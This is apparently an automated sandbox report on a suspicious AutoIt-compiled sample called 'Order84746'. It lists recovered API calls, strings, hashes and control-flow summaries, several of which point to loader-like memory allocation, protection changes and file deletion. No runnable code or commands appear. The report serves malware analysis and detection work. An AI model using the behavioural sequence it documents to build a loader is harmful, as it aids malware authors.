                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Window$IconLoad$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                          • String ID: This is a third-party compiled AutoIt script.$runas
                          • API String ID: 438480954-3287110873
                          • Opcode ID: ddd89b6b8a713f978c83786f4447e5145b2eef597d140375de36f2423510b525
                          • Instruction ID: a1fd96fc9a23303eecd045a0d2a3bb4de7898f63dacbb370a3765ab977f177d6
                          • Opcode Fuzzy Hash: ddd89b6b8a713f978c83786f4447e5145b2eef597d140375de36f2423510b525
                          • Instruction Fuzzy Hash: F851E830E0C289AACF11ABBADC45EED7B79FF57748F004068F551E3192DA704A459B62

                          Control-flow Graph

                          APIs
                          • NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 008E37B3
                          • KillTimer.USER32(?,00000001), ref: 008E37DD
                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 008E3800
                          • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 008E380B
                          • CreatePopupMenu.USER32 ref: 008E381F
                          • PostQuitMessage.USER32(00000000), ref: 008E382E
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Timer$ClipboardCreateFormatKillMenuMessageNtdllPopupPostProc_QuitRegisterWindow
                          • String ID: TaskbarCreated
                          • API String ID: 157504867-2362178303

                          Control-flow Graph
                          APIs
                          • GetVersionExW.KERNEL32(?), ref: 008FDDEC
                          • GetCurrentProcess.KERNEL32(00000000,0097DC38,?,?), ref: 008FDEAC
                          • GetNativeSystemInfo.KERNELBASE(?,0097DC38,?,?), ref: 008FDF01
                          • FreeLibrary.KERNEL32(00000000,?,?), ref: 008FDF0C
                          • FreeLibrary.KERNEL32(00000000,?,?), ref: 008FDF1F
                          • GetSystemInfo.KERNEL32(?,0097DC38,?,?), ref: 008FDF29
                          • GetSystemInfo.KERNEL32(?,0097DC38,?,?), ref: 008FDF35
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion
                          • String ID:
                          • API String ID: 3851250370-0

                          Control-flow Graph
                          APIs
                          • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 008E407B
                          • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,008E449E,?,?,00000000,00000001), ref: 008E4092
                          • LoadResource.KERNEL32(?,00000000,?,?,008E449E,?,?,00000000,00000001,?,?,?,?,?,?,008E41FB), ref: 00954F1A
                          • SizeofResource.KERNEL32(?,00000000,?,?,008E449E,?,?,00000000,00000001,?,?,?,?,?,?,008E41FB), ref: 00954F2F
                          • LockResource.KERNEL32(008E449E,?,?,008E449E,?,?,00000000,00000001,?,?,?,?,?,?,008E41FB,00000000), ref: 00954F42
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                          • String ID: SCRIPT
                          • API String ID: 3051347437-3967369404
                          APIs
                          • LoadLibraryA.KERNEL32(?), ref: 009E608A
                          • GetProcAddress.KERNEL32(?,009DEFF9), ref: 009E60A8
                          • ExitProcess.KERNEL32(?,009DEFF9), ref: 009E60B9
                          • VirtualProtect.KERNELBASE(008E0000,00001000,00000004,?,00000000), ref: 009E6107
                          • VirtualProtect.KERNELBASE(008E0000,00001000), ref: 009E611C
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: ProtectVirtual$AddressExitLibraryLoadProcProcess
                          • String ID:
                          • API String ID: 1996367037-0
                          APIs
                          • GetFileAttributesW.KERNELBASE(?,00952F49), ref: 00926CB9
                          • FindFirstFileW.KERNELBASE(?,?), ref: 00926CCA
                          • FindClose.KERNEL32(00000000), ref: 00926CDA
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: FileFind$AttributesCloseFirst
                          • String ID:
                          • API String ID: 48322524-0
                          APIs
                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 008EE959
                          • timeGetTime.WINMM ref: 008EEBFA
                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 008EED2E
                          • TranslateMessage.USER32(?), ref: 008EED3F
                          • DispatchMessageW.USER32(?), ref: 008EED4A
                          • LockWindowUpdate.USER32(00000000), ref: 008EED79
                          • DestroyWindow.USER32 ref: 008EED85
                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 008EED9F
                          • Sleep.KERNEL32(0000000A), ref: 00955270
                          • TranslateMessage.USER32(?), ref: 009559F7
                          • DispatchMessageW.USER32(?), ref: 00955A05
                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00955A19
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                          • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                          • API String ID: 2641332412-570651680
                          APIs
                          • ___createFile.LIBCMT ref: 00915EC3
                          • ___createFile.LIBCMT ref: 00915F04
                          • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00915F2D
                          • __dosmaperr.LIBCMT ref: 00915F34
                          • GetFileType.KERNELBASE(00000000,?,?,?,?,?,00000000,00000109), ref: 00915F47
                          • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00915F6A
                          • __dosmaperr.LIBCMT ref: 00915F73
                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00915F7C
                          • __set_osfhnd.LIBCMT ref: 00915FAC
                          • __lseeki64_nolock.LIBCMT ref: 00916016
                          • __close_nolock.LIBCMT ref: 0091603C
                          • __chsize_nolock.LIBCMT ref: 0091606C
                          • __lseeki64_nolock.LIBCMT ref: 0091607E
                          • __lseeki64_nolock.LIBCMT ref: 00916176
                          • __lseeki64_nolock.LIBCMT ref: 0091618B
                          • __close_nolock.LIBCMT ref: 009161EB
                            • Part of subcall function 0090EA9C: CloseHandle.KERNELBASE(00000000,0098EEF4,00000000,?,00916041,0098EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0090EAEC
                            • Part of subcall function 0090EA9C: GetLastError.KERNEL32(?,00916041,0098EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0090EAF6
                            • Part of subcall function 0090EA9C: __free_osfhnd.LIBCMT ref: 0090EB03
                            • Part of subcall function 0090EA9C: __dosmaperr.LIBCMT ref: 0090EB25
                            • Part of subcall function 00907C0E: __getptd_noexit.LIBCMT ref: 00907C0E
                          • __lseeki64_nolock.LIBCMT ref: 0091620D
                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00916342
                          • ___createFile.LIBCMT ref: 00916361
                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0091636E
                          • __dosmaperr.LIBCMT ref: 00916375
                          • __free_osfhnd.LIBCMT ref: 00916395
                          • __invoke_watson.LIBCMT ref: 009163C3
                          • __wsopen_helper.LIBCMT ref: 009163DD
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                          • String ID: @
                          • API String ID: 3896587723-2766056989
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: __getptd_noexit
                          • String ID:
                          • API String ID: 3074181302-0

                          Control-flow Graph

                          APIs
                          • _wcscpy.LIBCMT ref: 0092FA96
                          • _wcschr.LIBCMT ref: 0092FAA4
                          • _wcscpy.LIBCMT ref: 0092FABB
                          • _wcscat.LIBCMT ref: 0092FACA
                          • _wcscat.LIBCMT ref: 0092FAE8
                          • _wcscpy.LIBCMT ref: 0092FB09
                          • __wsplitpath.LIBCMT ref: 0092FBE6
                          • _wcscpy.LIBCMT ref: 0092FC0B
                          • _wcscpy.LIBCMT ref: 0092FC1D
                          • _wcscpy.LIBCMT ref: 0092FC32
                          • _wcscat.LIBCMT ref: 0092FC47
                          • _wcscat.LIBCMT ref: 0092FC59
                          • _wcscat.LIBCMT ref: 0092FC6E
                            • Part of subcall function 0092BFA4: _wcscmp.LIBCMT ref: 0092C03E
                            • Part of subcall function 0092BFA4: __wsplitpath.LIBCMT ref: 0092C083
                            • Part of subcall function 0092BFA4: _wcscpy.LIBCMT ref: 0092C096
                            • Part of subcall function 0092BFA4: _wcscat.LIBCMT ref: 0092C0A9
                            • Part of subcall function 0092BFA4: __wsplitpath.LIBCMT ref: 0092C0CE
                            • Part of subcall function 0092BFA4: _wcscat.LIBCMT ref: 0092C0E4
                            • Part of subcall function 0092BFA4: _wcscat.LIBCMT ref: 0092C0F7
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
                          • String ID: >>>AUTOIT SCRIPT<<<
                          • API String ID: 2955681530-2806939583

                          Control-flow Graph
                          APIs
                            • Part of subcall function 0092BDB4: __time64.LIBCMT ref: 0092BDBE
                            • Part of subcall function 008E4517: _fseek.LIBCMT ref: 008E452F
                          • __wsplitpath.LIBCMT ref: 0092C083
                            • Part of subcall function 00901DFC: __wsplitpath_helper.LIBCMT ref: 00901E3C
                          • _wcscpy.LIBCMT ref: 0092C096
                          • _wcscat.LIBCMT ref: 0092C0A9
                          • __wsplitpath.LIBCMT ref: 0092C0CE
                          • _wcscat.LIBCMT ref: 0092C0E4
                          • _wcscat.LIBCMT ref: 0092C0F7
                          • _wcscmp.LIBCMT ref: 0092C03E
                            • Part of subcall function 0092C56D: _wcscmp.LIBCMT ref: 0092C65D
                            • Part of subcall function 0092C56D: _wcscmp.LIBCMT ref: 0092C670
                          • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0092C2A1
                          • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0092C338
                          • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0092C34E
                          • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0092C35F
                          • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0092C371
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath$Copy__time64__wsplitpath_helper_fseek_wcscpy
                          • String ID:
                          • API String ID: 2378138488-0
                          • Opcode ID: 60e4b496166f21a072d7140e376521c330671d1403624796c4a5474586ad4a47
                          • Instruction ID: 036897235881a4c2db808bfc9cf583777ab32cf4a39eaa7c9b2a426ad240e0c2
                          • Opcode Fuzzy Hash: 60e4b496166f21a072d7140e376521c330671d1403624796c4a5474586ad4a47
                          • Instruction Fuzzy Hash: 5FC12AB1A00229AFDF11DF95DC81EDEB7BCEF89304F1040AAF609E6155DB709A848F65

                          Control-flow Graph (rendered graph not reproduced)

                          APIs
                          • GetSysColorBrush.USER32(0000000F), ref: 008E3E79
                          • LoadCursorW.USER32(00000000,00007F00), ref: 008E3E88
                          • LoadIconW.USER32(00000063), ref: 008E3E9E
                          • LoadIconW.USER32(000000A4), ref: 008E3EB0
                          • LoadIconW.USER32(000000A2), ref: 008E3EC2
                            • Part of subcall function 008E4024: LoadImageW.USER32(008E0000,00000063,00000001,00000010,00000010,00000000), ref: 008E4048
                          • RegisterClassExW.USER32(?), ref: 008E3F30
                            • Part of subcall function 008E3F53: GetSysColorBrush.USER32(0000000F), ref: 008E3F86
                            • Part of subcall function 008E3F53: RegisterClassExW.USER32(00000030), ref: 008E3FB0
                            • Part of subcall function 008E3F53: RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 008E3FC1
                            • Part of subcall function 008E3F53: LoadIconW.USER32(000000A9), ref: 008E4004
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Load$Icon$Register$BrushClassColor$ClipboardCursorFormatImage
                          • String ID: #$0$AutoIt v3
                          • API String ID: 2880975755-4155596026
                          • Opcode ID: 1a400d08d2c33f6ade930bc8e92044175b7fbabd9a22ebd0b710d5bfbdf436dd
                          • Instruction ID: 09bfe388fa154c811cb9f71216fc4c8b86489d611e49efc650e3ced4d558fcf9
                          • Opcode Fuzzy Hash: 1a400d08d2c33f6ade930bc8e92044175b7fbabd9a22ebd0b710d5bfbdf436dd
                          • Instruction Fuzzy Hash: 6E2131B4E1C354ABCB04DFA9EC49A99BBF5FF49314F00412EE614A32A0D7754644AFD1

                          Control-flow Graph (rendered graph not reproduced)

                          APIs
                          • GetSysColorBrush.USER32(0000000F), ref: 008E3F86
                          • RegisterClassExW.USER32(00000030), ref: 008E3FB0
                          • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 008E3FC1
                          • LoadIconW.USER32(000000A9), ref: 008E4004
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Register$BrushClassClipboardColorFormatIconLoad
                          • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                          • API String ID: 975902462-1005189915
                          • Opcode ID: 412b45a59f84a1c54e31a5a21b5d2dd683255a8ff50779435db667c815a5b676
                          • Instruction ID: 9d01e7467396f68e317755272999e4c9d2defec9524b6971e26623243b0538cf
                          • Opcode Fuzzy Hash: 412b45a59f84a1c54e31a5a21b5d2dd683255a8ff50779435db667c815a5b676
                          • Instruction Fuzzy Hash: F821C5B5E29318AFDB00DFA5EC89BCDBBB4FB09700F04411AF625E62A0D7B54544AF91

                          Control-flow Graph (rendered graph not reproduced; recovered block summary)
                          Entry block 11db228 (call 11d8c38); 11db2dd call 11dc138, CreateFileW; 11db321 VirtualAlloc; 11db342 ReadFile; 11db360 VirtualAlloc; 11db3a7 and 11db3d9 call 11dc388; 11db40a call 11dc198; 11db428 CloseHandle; 11db438 VirtualFree; 11db514 VirtualFree; block 11db446 loops back to the CreateFileW block.
                          APIs
                          • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 011DB2F9
                          • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 011DB51F
                          Memory Dump Source
                          • Source File: 00000000.00000002.1678053935.00000000011D8000.00000040.00000020.00020000.00000000.sdmp, Offset: 011D8000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_11d8000_Order84746.jbxd
                          Similarity
                          • API ID: CreateFileFreeVirtual
                          • String ID:
                          • API String ID: 204039940-0
                          • Opcode ID: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                          • Instruction ID: ee785dd32cac538dc2ce8f7b7fbc22249f5d6217056ff124d0cb7362596f741e
                          • Opcode Fuzzy Hash: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                          • Instruction Fuzzy Hash: 2DA11A70E04209EBDB18CFA4C894BEEBBB5FF49304F208559E616BB280D7759A41CF55

                          Control-flow Graph (rendered graph not reproduced; recovered block summary)
                          Entry block 8e49fb (call 8ebcce, RegOpenKeyExW); 9541cc RegQueryValueExW; 9541e5 call 8ff4ea, call 8e47b7, RegQueryValueExW; 954224 call 8e6a63; 95423d call 8e47e2; 954246 RegCloseKey.
                          APIs
                          • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 008E4A1D
                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 009541DB
                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0095421A
                          • RegCloseKey.ADVAPI32(?), ref: 00954249
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: QueryValue$CloseOpen
                          • String ID: Include$Software\AutoIt v3\AutoIt
                          • API String ID: 1586453840-614718249
                          • Opcode ID: e0c53a35ae4fd9923c2ce7cceb3ff07316c57dcc8439f4f2ccb234e7612ce096
                          • Instruction ID: 67031e3133debdc2d72183b29279fba52e933db9a6354da9fe80257f522c6638
                          • Opcode Fuzzy Hash: e0c53a35ae4fd9923c2ce7cceb3ff07316c57dcc8439f4f2ccb234e7612ce096
                          • Instruction Fuzzy Hash: DE117F71A01118BFEB00EBA9CD86DBF7BBCEF15358F004068F516D2191EA709E45EB50

                          Control-flow Graph (rendered graph not reproduced; recovered block summary)
                          Single block 8e36b8-8e3728: CreateWindowExW x2, ShowWindow x2.
                          APIs
                          • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 008E36E6
                          • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 008E3707
                          • ShowWindow.USER32(00000000,?,?,?,?,008E3AA3,?), ref: 008E371B
                          • ShowWindow.USER32(00000000,?,?,?,?,008E3AA3,?), ref: 008E3724
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
